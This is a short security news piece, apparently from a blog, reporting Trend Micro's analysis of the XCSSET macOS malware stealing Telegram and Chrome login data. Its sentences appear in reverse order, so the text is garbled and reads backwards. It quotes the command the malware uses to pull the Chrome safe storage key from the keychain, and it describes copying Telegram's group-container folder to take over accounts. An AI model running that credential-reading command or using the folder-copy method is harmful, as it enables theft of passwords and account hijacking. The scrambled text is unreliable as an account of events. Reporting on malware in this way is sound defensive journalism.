Once it has obtained the Chrome safe_storage_key, it decrypts all the sensitive data and uploads it to the C&C server.” states the report. “The user is then prompted to grant these privileges via a fake dialog box. Then the malware puts all the operations that need root privilege together in a single function. XCSSET gets the safe_storage_key using the command security find- generic-password -wa ‘Chrome’, which requires root privileges. Trend Micro also provides details about the technique use by the XCSSET malware to steal the passwords from Google Chrome using the Safe Storage Key, which is stored in “Chrome Safe Storage.” “We recommend that application developers refrain from storing sensitive data in the sandbox directory, particularly those related to login information.” Not all executable files are sandboxed on macOS, which means a simple script can steal all the data stored in the sandbox directory.” reads the analysis published by Trend Micro. “On macOS, the Application sandbox directory ~/Library/Containers/ and ~/Library/Group Containers/ can be accessed (with READ/WRITE permissions) by common users. Then attackers can copy the stolen folder on another machine with Telegram installed to act on behalf of the legitimate owner of the account.Įxperts pointed out that the XCSSET malware can steal sensitive data using this technique because normal users can access the Application sandbox directory with read/write permissions. In order to target Telegram, the malware creates the archive “telegram.applescript” for the “keepcoder.Telegram” folder which is located in the Group Containers folder (“~/Library/Group Containers/.keepcoder.Telegram”). Security researchers from Trend Micro continues to monitor the evolution of the XCSSET macOS malware, new variants are able to steal login information from multiple apps, including Telegram and Google Chrome, and send them to C2. XCSSET macOS malware continues to evolve, now it is able to steal login information from multiple apps, including Telegram and Google Chrome.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |